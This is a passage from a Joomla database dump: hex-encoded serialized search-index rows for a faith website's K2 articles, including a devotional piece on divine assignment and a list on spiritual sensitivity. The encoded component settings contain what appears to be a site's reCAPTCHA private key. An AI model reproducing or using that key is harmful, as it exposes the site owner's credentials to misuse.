223b733a31383a2273686f774174746163686d656e7473546162223b733a313a2231223b733a31333a2273686f774b32506c7567696e73223b733a313a2231223b733a32323a2273696465426172446973706c617946726f6e74656e64223b733a313a2230223b733a31323a226d65726765456469746f7273223b733a313a2231223b733a31343a2273696465426172446973706c6179223b733a313a2231223b733a31373a226174746163686d656e7473466f6c646572223b733a303a22223b733a31363a2268696465496d706f7274427574746f6e223b733a313a2230223b733a31323a22676f6f676c65536561726368223b733a313a2230223b733a32313a22676f6f676c65536561726368436f6e7461696e6572223b733a31313a226b32436f6e7461696e6572223b733a31333a224b325573657250726f66696c65223b733a313a2230223b733a31313a224b325573657247726f7570223b733a313a2231223b733a383a227265646972656374223b733a333a22313038223b733a31313a2261646d696e536561726368223b733a363a2273696d706c65223b733a31323a22636f6f6b6965446f6d61696e223b733a303a22223b733a31363a2267617468657253746174697374696373223b733a313a2231223b733a31333a2274616767696e6753797374656d223b733a313a2231223b733a383a226c6f636b54616773223b733a313a2230223b733a31333a2273686f7754616746696c746572223b733a313a2230223b733a393a226b325461674e6f726d223b733a313a2230223b733a31333a226b325461674e6f726d43617365223b733a353a226c6f776572223b733a33313a226b325461674e6f726d4164646974696f6e616c5265706c6163656d656e7473223b733a303a22223b733a32303a227265636170746368615f7075626c69635f6b6579223b733a34303a22364c667869686b5541414141414d6354446653334b74436877475658796a5a69634a36665755514d223b733a32313a227265636170746368615f707269766174655f6b6579223b733a37323a22364c667869686b554141414141476a736f4f3955375f61324c693558364a5250484a6b73556d4555205374657020313a20636c69656e742d7369646520696e746567726174696f6e223b733a31353a227265636170746368615f7468656d65223b733a353a22636c65616e223b733a31313a227265636170746368615632223b733a313a2231223b733a32333a227265636170746368614f6e526567697374726174696f6e223b733a313a2231223b733a31333a22616b69736d65744170694b6579223b733a303a22223b733a31333a2273746f70466f72756d5370616d223b733a313a2230223b733a31393a2273746f70466f72756d5370616d4170694b6579223b733a303a22223b733a31383a2270726f66696c6550616765446973706c6179223b733a313a2230223b733a32313a2273686f774974656d73436f756e74657241646d696e223b733a313a2231223b733a31373a2273686f774368696c644361744974656d73223b733a313a2231223b733a32323a2264697361626c65436f6d706163744f72646572696e67223b733a313a2230223b733a31333a226d657461446573634c696d6974223b733a333a22313530223b733a32323a22656e666f7263655345465265706c6163656d656e7473223b733a313a2230223b733a31353a225345465265706c6163656d656e7473223b733a323736383a22c3807c412c20c3817c412c20c3827c412c20c3837c412c20c3847c412c20c3857c412c20c3a07c612c20c3a17c612c20c3a27c612c20c3a37c612c20c3a47c612c20c3a57c612c20c4807c412c20c4817c612c20c4827c412c20c4837c612c20c4847c412c20c4857c612c20c3877c432c20c3a77c632c20c4867c432c20c4877c632c20c4887c432c20c4897c632c20c48a7c432c20c48b7c632c20c48c7c432c20c48d7c632c20c3907c442c20c3b07c642c20c48e7c442c20c48f7c642c20c4907c442c20c4917c642c20c3887c452c20c3897c452c20c38a7c452c20c38b7c452c20c3a87c652c20c3a97c652c20c3aa7c652c20c3ab7c652c20c4927c452c20c4937c652c20c4947c452c20c4957c652c20c4967c452c20c4977c652c20c4987c452c20c4997c652c20c49a7c452c20c49b7c652c20c49c7c472c20c49d7c672c20c49e7c472c20c49f7c672c20c4a07c472c20c4a17c672c20c4a27c472c20c4a37c672c20c4a47c482c20c4a57c682c20c4a67c482c20c4a77c682c20c38c7c492c20c38d7c492c20c38e7c492c20c38f7c492c20c3ac7c692c20c3ad7c692c20c3ae7c692c20c3af7c692c20c4a87c492c20c4a97c692c20c4aa7c492c20c4ab7c692c20c4ac7c492c20c4ad7c692c20c4ae7c492c20c4af7c692c20c4b07c492c20c4b17c692c20c4b47c4a2c20c4b57c6a2c20c4b67c4b2c20c4b77c6b2c20c4b87c6b2c20c4b97c4c2c20c4ba7c6c2c20c4bb7c4c2c20c4bc7c6c2c20c4bd7c4c2c20c4be7c6c2c20c4bf7c4c2c20c5807c6c2c20c5817c4c2c20c5827c6c2c20c3917c4e2c20c3b17c6e2c20c5837c4e2c20c5847c6e2c20c5857c4e2c20c5867c6e2c20c5877c4e2c20c5887c6e2c20c5897c6e2c20c58a7c4e2c20c58b7c6e2c20c3927c4f2c20c3937c4f2c20c3947c4f2c20c3957c4f2c20c3967c4f2c20c3987c4f2c20c3b27c6f2c20c3b37c6f2c20c3b47c6f2c20c3b57c6f2c20c3b67c6f2c20c3b87c6f2c20c58c7c4f2c20c58d7c6f2c20c58e7c4f2c20c58f7c6f2c20c5907c4f2c20c5917c6f2c20c5947c522c20c5957c722c20c5967c522c20c5977c722c20c5987c522c20c5997c722c20c59a7c532c20c59b7c732c20c59c7c532c20c59d7c732c20c59e7c532c20c59f7c732c20c5a07c532c20c5a17c732c20c5bf7c732c20c5a27c542c20c5a37c742c20c5a47c542c20c5a57c742c20c5a67c542c20c5a77c742c20c3997c552c20c39a7c552c20c39b7c552c20c39c7c552c20c3b97c752c20c3ba7c752c20c3bb7c752c20c3bc7c752c20c5a87c552c20c5a97c752c20c5aa7c552c20c5ab7c752c20c5ac7c552c20c5ad7c752c20c5ae7c552c20c5af7c752c20c5b07c552c20c5b17c752c20c5b27c552c20c5b37c752c20c5b47c572c20c5b57c772c20c39d7c592c20c3bd7c792c20c3bf7c792c20c5b67c592c20c5b77c792c20c5b87c592c20c5b97c5a2c20c5ba7c7a2c20c5bb7c5a2c20c5bc7c7a2c20c5bd7c5a2c20c5be7c7a2c20ceb17c612c20ceb27c622c20ceb37c672c20ceb47c642c20ceb57c652c20ceb67c7a2c20ceb77c682c20ceb87c74682c20ceb97c692c20ceba7c6b2c20cebb7c6c2c20cebc7c6d2c20cebd7c6e2c20cebe7c782c20cebf7c6f2c20cf807c702c20cf817c722c20cf837c732c20cf847c742c20cf857c792c20cf867c662c20cf877c63682c20cf887c70732c20cf897c772c20ce917c412c20ce927c422c20ce937c472c20ce947c442c20ce957c452c20ce967c5a2c20ce977c482c20ce987c54682c20ce997c492c20ce9a7c4b2c20ce9b7c4c2c20ce9c7c4d2c20ce9e7c582c20ce9f7c4f2c20cea07c502c20cea17c522c20cea37c532c20cea47c542c20cea57c592c20cea67c462c20cea77c43682c20cea87c50732c20cea97c572c20ceac7c612c20cead7c652c20ceae7c682c20ceaf7c692c20cf8c7c6f2c20cf8d7c792c20cf8e7c772c20ce867c412c20ce887c452c20ce897c482c20ce8a7c492c20ce8c7c4f2c20ce8e7c592c20ce8f7c572c20cf8a7c692c20ce907c692c20cf8b7c792c20cf827c732c20d0907c412c20d3907c412c20d3927c412c20d3987c452c20d39a7c452c20d3947c452c20d0917c422c20d0927c562c20d0937c472c20d2907c472c20d0837c472c20d2927c472c20d3b67c472c20797c592c20d0947c442c20d0957c452c20d0807c452c20d0817c594f2c20d3967c452c20d2bc7c452c20d2be7c452c20d0847c59452c20d0967c5a482c20d3817c445a482c20d2967c5a482c20d39c7c445a482c20d0977c5a2c20d2987c5a2c20d39e7c445a2c20d3a07c445a2c20d0857c445a2c20d0987c492c20d08d7c492c20d3a47c492c20d3a27c492c20d0867c492c20d0877c4a492c20d3807c492c20d0997c592c20d28a7c592c20d0887c4a2c20d09a7c4b2c20d29a7c512c20d29e7c512c20d2a07c4b2c20d3837c512c20d29c7c4b2c20d09b7c4c2c20d3857c4c2c20d0897c4c2c20d09c7c4d2c20d38d7c4d2c20d09d7c4e2c20d3897c4e2c20d2a27c4e2c20d3877c4e2c20d2a47c4e2c20d08a7c4e2c20d09e7c4f2c20d3a67c4f2c20d3a87c4f2c20d3aa7c4f2c20d2a87c4f2c20d09f7c502c20d2a67c50462c20d0a07c502c20d28e7c502c20d0a17c532c20d2aa7c532c20d0a27c542c20d2ac7c54482c20d08b7c542c20d08c7c4b2c20d0a37c552c20d08e7c552c20d3b27c552c20d3b07c552c20d3ae7c552c20d2ae7c552c20d2b07c552c20d0a47c462c20d0a57c482c20d2b27c482c20d2ba7c482c20d0a67c54532c20d2b47c54532c20d0a77c43482c20d3b47c43482c20d2b67c43482c20d38b7c43482c20d2b87c43482c20d08f7c445a2c20d0a87c53482c20d0a97c5348542c20d0aa7c412c20d0ab7c592c20d3b87c592c20d0ac7c592c20d28c7c592c20d0ad7c452c20d3ac7c452c20d0ae7c59552c20d0af7c59412c20d0b07c612c20d3917c612c20d3937c612c20d3997c652c20d39b7c652c20d3957c652c20d0b17c622c20d0b27c762c20d0b37c672c20d2917c672c20d1937c672c20d2937c672c20d3b77c672c20797c792c20d0b47c642c20d0b57c652c20d1907c652c20d1917c796f2c20d3977c652c20d2bd7c652c20d2bf7c652c20d1947c79652c20d0b67c7a682c20d3827c647a682c20d2977c7a682c20d39d7c647a682c20d0b77c7a2c20d2997c7a2c20d39f7c647a2c20d3a17c647a2c20d1957c647a2c20d0b87c692c20d19d7c692c20d3a57c692c20d3a37c692c20d1967c692c20d1977c6a692c20d3807c692c20d0b97c792c20d28b7c792c20d1987c6a2c20d0ba7c6b2c20d29b7c712c20d29f7c712c20d2a17c6b2c20d3847c712c20d29d7c6b2c20d0bb7c6c2c20d3867c6c2c20d1997c6c2c20d0bc7c6d2c20d38e7c6d2c20d0bd7c6e2c20d38a7c6e2c20d2a37c6e2c20d3887c6e2c20d2a57c6e2c20d19a7c6e2c20d0be7c6f2c20d3a77c6f2c20d3a97c6f2c20d3ab7c6f2c20d2a97c6f2c20d0bf7c702c20d2a77c70662c20d1807c702c20d28f7c702c20d1817c732c20d2ab7c732c20d1827c742c20d2ad7c74682c20d19b7c742c20d19c7c6b2c20d1837c752c20d19e7c752c20d3b37c752c20d3b17c752c20d3af7c752c20d2af7c752c20d2b17c752c20d1847c662c20d1857c682c20d2b37c682c20d2bb7c682c20d1867c74732c20d2b57c74732c20d1877c63682c20d3b57c63682c20d2b77c63682c20d38c7c63682c20d2b97c63682c20d19f7c647a2c20d1887c73682c20d1897c7368742c20d18a7c612c20d18b7c792c20d3b97c792c20d18c7c792c20d28d7c792c20d18d7c652c20d3ad7c652c20d18e7c79752c20d18f7c7961223b733a353a226b32536566223b733a313a2230223b733a31333a226b325365664c6162656c436174223b733a373a22636f6e74656e74223b733a31333a226b325365664c6162656c546167223b733a333a22746167223b733a31343a226b325365664c6162656c55736572223b733a363a22617574686f72223b733a31363a226b325365664c6162656c536561726368223b733a363a22736561726368223b733a31343a226b325365664c6162656c44617465223b733a343a2264617465223b733a31343a226b325365664c6162656c4974656d223b733a313a2230223b733a32363a226b325365664c6162656c4974656d437573746f6d507265666978223b733a303a22223b733a31373a226b32536566496e736572744974656d4964223b733a313a2231223b733a32343a226b325365664974656d49645469746c65416c696173536570223b733a343a2264617368223b733a32323a226b325365665573654974656d5469746c65416c696173223b733a313a2231223b733a31363a226b32536566496e736572744361744964223b733a313a2231223b733a32333a226b3253656643617449645469746c65416c696173536570223b733a343a2264617368223b733a32313a226b325365665573654361745469746c65416c696173223b733a313a2231223b7d733a31343a22002a00696e697469616c697a6564223b623a313b733a393a22736570617261746f72223b733a313a222e223b7d733a373a226d6574616b6579223b733a303a22223b733a383a226d65746164657363223b733a303a22223b733a383a226d65746164617461223b4f3a32343a224a6f6f6d6c615c52656769737472795c5265676973747279223a333a7b733a373a22002a0064617461223b4f3a383a22737464436c617373223a323a7b733a363a22726f626f7473223b733a303a22223b733a363a22617574686f72223b733a303a22223b7d733a31343a22002a00696e697469616c697a6564223b623a313b733a393a22736570617261746f72223b733a313a222e223b7d733a383a226f72646572696e67223b733a323a223231223b733a353a227472617368223b733a313a2230223b733a393a226361745f7472617368223b733a313a2230223b733a383a2263617465676f7279223b733a353a224661697468223b733a393a226361745f7374617465223b733a313a2231223b733a31303a226361745f616363657373223b733a313a2231223b733a31393a2265787472615f6669656c64735f736561726368223b733a303a22223b733a31323a2265787472615f6669656c6473223b733a323a225b5d223b733a343a22736c7567223b733a34333a2236323a6c6976696e672d7468652d646976696e656c792d61737369737465642d6c6966652d706172742d32223b733a373a22636174736c7567223b733a373a22323a6661697468223b733a363a22617574686f72223b733a393a224c6966656f61736973223b733a363a226c61796f7574223b733a343a226974656d223b733a343a2270617468223b733a36323a222f636f6d706f6e656e742f6b322f6974656d2f36322d6c6976696e672d7468652d646976696e656c792d61737369737465642d6c6966652d706172742d32223b733a31303a226d657461617574686f72223b4e3b7d733a31353a22002a00696e737472756374696f6e73223b613a353a7b693a313b613a333a7b693a303b733a353a227469746c65223b693a313b733a383a227375627469746c65223b693a323b733a323a226964223b7d693a323b613a323a7b693a303b733a373a2273756d6d617279223b693a313b733a343a22626f6479223b7d693a333b613a393a7b693a303b733a343a226d657461223b693a313b733a31303a226c6973745f7072696365223b693a323b733a31303a2273616c655f7072696365223b693a333b733a373a226d6574616b6579223b693a343b733a383a226d65746164657363223b693a353b733a31303a226d657461617574686f72223b693a363b733a363a22617574686f72223b693a373b733a31363a22637265617465645f62795f616c696173223b693a383b733a31393a2265787472615f6669656c64735f736561726368223b7d693a343b613a323a7b693a303b733a343a2270617468223b693a313b733a353a22616c696173223b7d693a353b613a313a7b693a303b733a383a22636f6d6d656e7473223b7d7d733a31313a22002a007461786f6e6f6d79223b613a353a7b733a343a2254797065223b613a313a7b733a373a224b32204974656d223b4f3a32373a224a6f6f6d6c615c434d535c4f626a6563745c434d534f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a373a224b32204974656d223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a363a22417574686f72223b613a313a7b733a393a224c6966656f61736973223b4f3a32373a224a6f6f6d6c615c434d535c4f626a6563745c434d534f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a393a224c6966656f61736973223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a31313a224b322043617465676f7279223b613a313a7b733a353a224661697468223b4f3a32373a224a6f6f6d6c615c434d535c4f626a6563745c434d534f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a353a224661697468223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a383a224c616e6775616765223b613a313a7b733a313a222a223b4f3a32373a224a6f6f6d6c615c434d535c4f626a6563745c434d534f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a313a222a223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a31323a224578747261206669656c6473223b613a313a7b733a323a225b5d223b4f3a32373a224a6f6f6d6c615c434d535c4f626a6563745c434d534f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a323a225b5d223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d7d733a333a2275726c223b733a33393a22696e6465782e7068703f6f7074696f6e3d636f6d5f6b3226766965773d6974656d2669643d3632223b733a353a22726f757465223b733a38303a22696e6465782e7068703f6f7074696f6e3d636f6d5f6b3226766965773d6974656d2669643d36323a6c6976696e672d7468652d646976696e656c792d61737369737465642d6c6966652d706172742d32223b733a353a227469746c65223b733a34303a224c6976696e672074686520446976696e656c79204173736973746564204c69666520506172742032223b733a31313a226465736372697074696f6e223b733a363839313a22204920442045204e544920462059205448452041535349474e4d454e5420464f5220594f55522044455354494e5920476f64206d61646520796f7520666f72206120707572706f73652e20496620476f642063616c6c656420796f7520746f20626520612070726f66657373696f6e616c2074686174206973207768617420796f752061726520616e6f696e74656420666f722e2057652061726520616c6c206d61646520646966666572656e742066726f6d206f6e6520616e6f746865722c20627574206576657279206368696c64206f6620476f6420697320746f2073657276652074686520707572706f7365206f6620476f642e20476f64206d616465204573746865722062656175746966756c6c7920646966666572656e742066726f6d206576657279206f74686572206769726c206f66206865722074696d652e20466f722068657220746f2068617665206265636f6d652074686520717565656e206f662050657273696120616e64206e6f742064656c697665722049737261656c20776f756c642068617665206265656e20746f206d6973732074686520707572706f7365206f6620476f6420666f7220676976696e672068657220746865207468726f6e652e2057726f6e67206469736369706c657368697020636f6d657320696e207768656e2070656f706c652067657420746f2074686520706c616365206f662064657374696e7920616e64207468657920686176652077726f6e6720707572706f7365732074686572652e204f6e636520796f752066696e6420796f75722061737369676e6d656e7420696e20746865204b696e67646f6d2c20736574746c6520646f776e20616e6420646f2069742e205768657468657220796f7520617265206120676f7665726e6f722c206120707265736964656e742c2061207072696d65206d696e69737465722c20612073656e61746f722c206120627573696e6573736d616e206f72206120686f757365776966652c20476f642068617320616e2061737369676e6d656e7420666f7220796f752e204173206120686f757365776966652c20476f642068616420616e2061737369676e6d656e7420666f72204d61727920746f2070726f76696465206120776f6d6220666f72204a6573757320746f20626520626f726e2e2048652068616420616e2061737369676e6d656e7420666f72204a6f736570682c206120627573696e6573736d616e2c20746f2070726f76696465206120686f6d652061746d6f737068657265207768657265204a6573757320636f756c642067726f7720757020696e20746865206469736369706c696e6573206f6620746865204a65776973682072656c6967696f6e2c20736f207468617420486520636f756c6420656e74657220746865206d696e6973747279206f6620612070726f7068657420756e64657220746865204f6c642054657374616d656e7420616e6420486520636f756c642066756c66696c6c204869732063616c6c696e672e204576657279206368696c64206f6620476f64206d757374206b6e6f77207468652061737369676e6d656e7420476f64207261697365642068696d2f68657220666f722e20466f72204573746865722c207368652068616420746f206265636f6d6520717565656e20736f20617320746f2062652061626c6520746f20686176652074686520636c6f757420616e6420617574686f7269747920746f20737065616b20746f20746865206b696e6720746f20636f756e7465722048616d616ee280997320706c6f7420616e6420666163696c6974617465207468652073616c766174696f6e206f66207468652070656f706c65206f6620476f642e2054686174207761732077686174204d6f72646563616920746f6c642068657220696e2074686520626f6f6b206f662045737468657220343a31343a20e2809c205965742077686f206b6e6f7773207768657468657220796f75206861766520636f6d6520746f20746865206b696e67646f6d20666f72207375636820612074696d6520617320746869733fe2809d20486572206265696e6720617420746865206b696e67e28099732070616c61636520776173206e6f74206163636964656e74616c3b2069742077617320612064656c696265726174652c20707572706f736566756c2c2074696d65642c2064657369676e6564206172726976616c2e205768656e20796f752067657420746f20776865726520796f752061726520676f696e672c206974e280997320612070726f63657373206f6620476f6420616e6420796f752077696c6c2062652061626c6520746f20747261636520796f7572206a6f75726e657920616e6420686f7720476f642067756964656420796f75722073746570732e20444956494e452050524f564953494f4e20464f5220594f55522041535349474e4d454e5420556e6465727374616e642074686174207768696c65207765206172652068657265206f6e2065617274682c20776520617265206f6e206f6666696369616c20647574792e20446f6ee280997420666f7267657420746861742e20476f642063616e206d616b6520796f7572206c69666520636f6d666f727461626c6520666f7220796f75722061737369676e6d656e742e204974e280997320616d617a696e6720686f772070656f706c65207468696e6b207468617420476f6420697320696e746572657374656420696e20746865697220737566666572696e672c2062757420796f75206d7573746861766520612062616c616e6365642069646561206f66207768617420476f6420706c616e6e656420666f7220796f752e2041207369737465722077686f2077617320696e206572726f72206f6e636520746f6c64206d65207468617420476f64207361696420492073686f756c6420676976652068657220e282a63133302c30303020746f20627579206c616e6420666f7220686572206d696e69737472792e20536865207361696420492073686f756c642073656c6c206d792063617220746f20646f20736f20616e64207468617420476f6420776f756c642067697665206d6520612068656c69636f7074657220696e2072657475726e2e20596f75206b6e6f772074686174e2809973206372617a7921204966204920736f6c64206d792063617220616e64204920737461727420746f2077616c6b206f6e20666f6f742c20686f7720646f657320746861742068656c70206d79206d696e69737472793f205365636f6e646c792c20492077617320636c6561722074686174206d792061737369676e6d656e7420617420746861742074696d6520646964206e6f74207265717569726520612068656c69636f707465722e204920776173207573696e6720616c6c206d7920666169746820746f206675656c20616e6420736572766963652074686520636172204920686164207468656e2c206966204920676f7420612068656c69636f707465722c2077686572652077696c6c204920676574206d6f6e657920746f20706179207468652073616c617279206f66207468652070696c6f7420616e642077686572652077696c6c2049207061726b207468652068656c69636f707465723f205768656e20796f75207468696e6b2061626f757420746861742c20796f75206b6e6f77206974207761732074686520646576696c20746861742077617320737065616b696e67207468726f7567682074686174206c6164792e20427574206966206d79206d696e697374727920726571756972657320612068656c69636f707465722c20476f642077696c6c2073656e64206f6e652e20576861746576657220796f75722061737369676e6d656e74206f6e207468652065617274682072657175697265732c2074686174206973207768617420476f642066756e64732e20476f642066756e6473207468652061737369676e6d656e7420486520636f6d6d69747320746f20796f757220636172652e2041736b20796f757273656c663a205768696368206f6620746865207468696e6773204920616d2063757272656e746c7920646f696e6720616e64206c61626f7572696e67206f766572206973206d7920646976696e652061737369676e6d656e743f2041737369676e6d656e74206973206e6f74207468652073616d65206173206a6f622e20476f642077696c6c2070726f6d6f746520796f7520617420796f7572206a6f622073757065726e61747572616c6c7920616e64206d69726163756c6f75736c7920666f7220796f75722061737369676e6d656e742c20736f20796f75206d7573742066696e6420746861742061737369676e6d656e742e20496620796f7520646f6ee280997420636f6e6e65637420746f2061737369676e6d656e742c207468657265206973206e6f20646976696e6520636f6d6d69746d656e7420746f20796f752e20476f64206973206e6f74206a75737420696e746572657374656420696e206d616b696e6720796f75207765616c7468792c2062757420486520697320636f6e6365726e656420776974682074686520707572706f736520666f7220746865207765616c74682e20476f64206973206e6f7420676f696e6720746f2074616b65206d6f6e65792066726f6d207468652068616e64206f66206120666f6f6c6973682073696e6e657220616e642070757420697420696e207468652068616e64206f66206120666f6f6c6973682043687269737469616e2e20486520646973706c616365642056617368746920616e6420707574204573746865722074686572652077686f2077617320676f696e6720746f20757365207468617420706c61636520636f72726563746c7920616e64207768656e20736865207761732061626f757420746f206d6973732069742c204d6f72646563616920736169642c20e2809c2e2e2e206d6179626520796f75206861766520636f6d6520746f20746865206b696e67646f6d20666f72207375636820612074696d6520617320746869732e2e2e2ee2809d204d6f7264656361692077617320696e20657373656e636520736179696e672c20e2809c4974206d65616e7320796f752068617665206265656e20707265706172656420666f72207468697320686f75723b207468697320697320746865206d65616e696e6720746f20616c6c20796f757220747261696e696e672e20546869732069732074686520726561736f6e2077687920796f757220666174686572206469656420616e6420476f64206f72646572656420746861742049206d656e746f7220796f752ee2809d20444946464552454e54204143434f554e54532054204f204b45455020476f6420646f6573206e6f74206861766520746f206c6f6f6b20617420796f75722062616e6b206163636f756e74206265666f72652068652074656c6c7320796f7520746f20646f20736f6d657468696e6720666f722068696d2e20496620476f6420697320676f696e6720746f2074656c6c20796f7520746f20646f20736f6d657468696e672c206865206973676f696e6720746f206c6f6f6b206174207768617420697320696e2065616368206f6620746865206163636f756e74732e205468657365206163636f756e74732077657265206f70656e6564206f6e20796f757220626568616c662062757420796f75206d6179206e6f7420626520736572766963696e672074686f7365206163636f756e74732c20616e642074686579206d617920626520646f726d616e742e2054686520646576696c20686173206e65766572206265656e207468652070726f626c656d206f6620476f64e28099732070656f706c653b2069742069732074686520737472656e677468206f66206f7572206661697468206f722074686520666565626c656e657373206f66206f75722066616974682e20596f7520646f6ee2809974206861766520616e792070726f626c656d207265616c6c793b20796f75206d6179206e656564206d6f7265206661697468206f72206d6f726520776973646f6d20736f6d6577686572652062757420616c6f6e6720746865736520736576656e206163636f756e747320796f75206861766520746f206e75727475726520616e642073657276696365207468656d2e204f2062656469656e6365204163636f756e743a20492068617665206f70657261746564207468657365206163636f756e74206e6f7720666f7220333520796561727320616e6420696e20616e206f6666696369616c206361706163697479207468617420476f642063616c6c6564206d6520616e642073686f776564206d652068697320706c616e20666f72206d652e20546869732069732068697320707572706f736520666f72206d79206c69666520616e6420696e2074686973203336746820796561722c20492068617665206e6f74206b6e6f77696e676c79206469736f62657965642074686520646972656374696f6e73206f6620476f642065786365707420746865206f6e652049e280996d206e6f742073757265207468617420476f642077616e7473206d6520746f20646f2062757420492068617665206f626579656420616c6c2e204f75722073616c766174696f6e20697320746865206d616e69666573746174696f6e206f6620746865206f62656469656e6365206f66204a65737573204368726973742e20596f7572206f62656469656e636520616e64206469736f62656469656e63652063616e20686176652067656e65726174696f6e616c20636f6e73657175656e6365732e20416c6c207468657365206163636f756e747320617265206f70656e65642c20616e67656c7320617265207265636f7264696e672c20476f64206973207761746368696e672069742c20616e64206f6e63652068652074656c6c7320757320746f20646f20736f6d657468696e672c206865206769766573207573207468617420696e737472756374696f6e7320696e2074686f7365206163636f756e74732e20462061697468204163636f756e743a20596f752063616e6e6f74206361737420796f7572206b6e6f776c65646765206265796f6e6420746865206c6576656c206f6620666169746820796f7520686176652e20496620796f7572206661697468206973206c6f772c20796f7520776f6ee2809974206361737420796f757220666561722075706f6e20476f643b20796f752077696c6c20636172727920796f7572206361726520796f757273656c662e2049742074616b657320666169746820746f206361737420796f75722063617265206f6e20746865204c6f72642e20417320796f75722066616974682067726f77732c2074686520636170616369747920746f20696e746572616374206265796f6e6420796f757220666169746820796f7520646f206e6f74207365652077696c6c20626520696e6372656173696e672e205768656e20796f7572206661697468206973206c6f772c20796f752074656e6420746f20696e7465726163742077697468207468652070656f706c6520616e642070726f626c656d7320796f752073656520616e64206974206973207665727920696d706f7274616e742074686174207765206c69766520746865206c696665206f662066616974682e20556e6465727374616e642074686174207768656e20796f7520676f7420626f726e20616761696e2c206365727461696e20637269746963616c206368616e67657320746f6f6b20706c61636520616e6420796f75206d757374206b6e6f7720686f7720746f206d616e6167652074686f7365206368616e6765732e2057206973646f6d204163636f756e743a204974207761732074686520776973646f6d206163636f756e74207468617420536f6c6f6d6f6e20686164207468617420676176652068696d2068697320766963746f72793b206e6f7420657665727920626f726e20616761696e20706572736f6e20697320776973652e20576973646f6d206973206162696c69747920746f20757365206b6e6f776c6564676520746f20796f757220616476616e7461676520616e6420796f7520686176652074686174206163636f756e742e2052656c61207420696f6e7368692070204163636f756e743a204f6e65206f6620746865206d61726b73206f6620776973646f6d207468617420796f752073656520696e2070656f706c65e2809973206c69666520697320686f7720746865792068616e646c652072656c6174696f6e736869707320696e207468656972206c6966652e20596f75206d7573742062652061626c6520746f207265636f676e697a65637269746963616c2072656c6174696f6e7368697073e282a6207768657468657220697420697320736d616c6c206f72206269672e204162696c69747920746f207265636f676e697a65207468652070656f706c6520746861742062656c6f6e6720746f2074686520706173742c20746f20746f64617920616e6420746f20746f6d6f72726f772c20616e642064697374696e6775697368206265747765656e207468656d206973207665727920696d706f7274616e742062656361757365206576657279626f647920696e20796f7572206c6966652062656c6f6e677320746f206f6e65206f6620746865736520746872656520706572696f64733a207965737465726461792c20746f64617920616e6420746f6d6f72726f772e20596f75206861766520746f206c6561726e20686f7720746f2068616e646c652072656c6174696f6e736869707320626563617573652074686572652061726520736f6d65207468696e6773207468617420796f7520646f206e6f7420686176652062757420616e6f7468657220706572736f6e207468617420796f75206b6e6f772077696c6c20686176652e20486f77207374726f6e6720697320796f75722072656c6174696f6e73686970207769746820476f643f20546865726520617265206d656e207468617420476f642077696c6c206272696e672063726f737320796f7572207061746820666f7220646966666572656e7420726561736f6e7320616e6420796f75206861766520746f2062652073656e7369746976652061626f757420746861742e2043616c6c696e67204163636f756e743a20596f75206861766520616e206163636f756e74206f66207468652063616c6c696e67206265666f726520796f75207765726520626f726e2e20476f642063616c6c656420796f7520617320612073706972697420616e642070757420796f7520696e206120626f647920617320612068756d616e20626f64792e20416e6f696e74696e67204163636f756e743a20416e64207468656e20796f7520617265206865726520746f20676f207769746820796f75722063616c6c696e6720616e20616e6f696e74696e672e2054686520616e6f696e74696e67206d616b6573207468652063616c6c696e67206561737920616e642077616c6b61626c652e20223b733a393a227075626c6973686564223b4e3b733a353a227374617465223b693a313b733a363a22616363657373223b733a313a2231223b733a383a226c616e6775616765223b733a313a222a223b733a31383a227075626c6973685f73746172745f64617465223b733a31393a22323031392d30372d31372031353a35373a3535223b733a31363a227075626c6973685f656e645f64617465223b733a31393a22303030302d30302d30302030303a30303a3030223b733a31303a2273746172745f64617465223b733a31393a22323031392d30372d31372031353a35373a3535223b733a383a22656e645f64617465223b733a31393a22303030302d30302d30302030303a30303a3030223b733a31303a226c6973745f7072696365223b4e3b733a31303a2273616c655f7072696365223b4e3b733a373a22747970655f6964223b693a323b733a31353a2264656661756c744c616e6775616765223b733a353a22656e2d4742223b7d);
INSERT INTO `y57u5_finder_links` (`link_id`, `url`, `route`, `title`, `description`, `indexdate`, `md5sum`, `published`, `state`, `access`, `language`, `publish_start_date`, `publish_end_date`, `start_date`, `end_date`, `list_price`, `sale_price`, `type_id`, `object`) VALUES
(308, 'index.php?option=com_k2&view=item&id=63', 'index.php?option=com_k2&view=item&id=63:sensitivity', 'Ways to Increase your Sensitivity', ' Today, I want to share with you ways that you can increase your spiritual sensitivity. Stay away from un anointed atmosphere. Create an atmosphere of the anointing by constant worship, praise, and regularly listening to messages. ', '2019-08-05 22:14:41', 'b1301c0698828ae44dc6566192e9869b', 1, 1, 1, '*', '2019-08-05 22:08:01', '0000-00-00 00:00:00', '2019-08-05 22:08:01', '0000-00-00 00:00:00', 0, 0, 2, 0x4f3a31393a2246696e646572496e6465786572526573756c74223a31393a7b733a31313a22002a00656c656d656e7473223b613a32373a7b733a323a226964223b733a323a223633223b733a353a22616c696173223b733a31313a2273656e7369746976697479223b733a373a2273756d6d617279223b733a3332323a223c64697620636c6173733d226974656d496e74726f54657874223e0d0a3c703e546f6461792c20492077616e7420746f207368617265207769746820796f752077617973207468617420796f752063616e20696e63726561736520796f75722073706972697475616c2073656e73697469766974792e3c2f703e0d0a3c6f6c3e0d0a3c6c693e5374617920617761792066726f6d20756e20616e6f696e7465642061746d6f7370686572652e2043726561746520616e2061746d6f737068657265206f662074686520616e6f696e74696e6720627920636f6e7374616e7420776f72736869702c207072616973652c20616e6420726567756c61726c79206c697374656e696e6720746f206d657373616765732e3c2f6c693e0d0a3c2f6f6c3e3c2f6469763e0d0a3c64697620636c6173733d226974656d46756c6c54657874223e223b733a343a22626f6479223b733a313830333a220d0a3c756c3e0d0a3c6c693e4d61696e7461696e20636c6f736520636f6e7461637420776974682061757468656e746963206769667420616e642063616c6c696e67206f662074686520486f6c79205370697269742e2053746f702073746179696e672061726f756e6420737472616e67652073706972697475616c20696e666c75656e6365732c2066616c73652070726f70686574732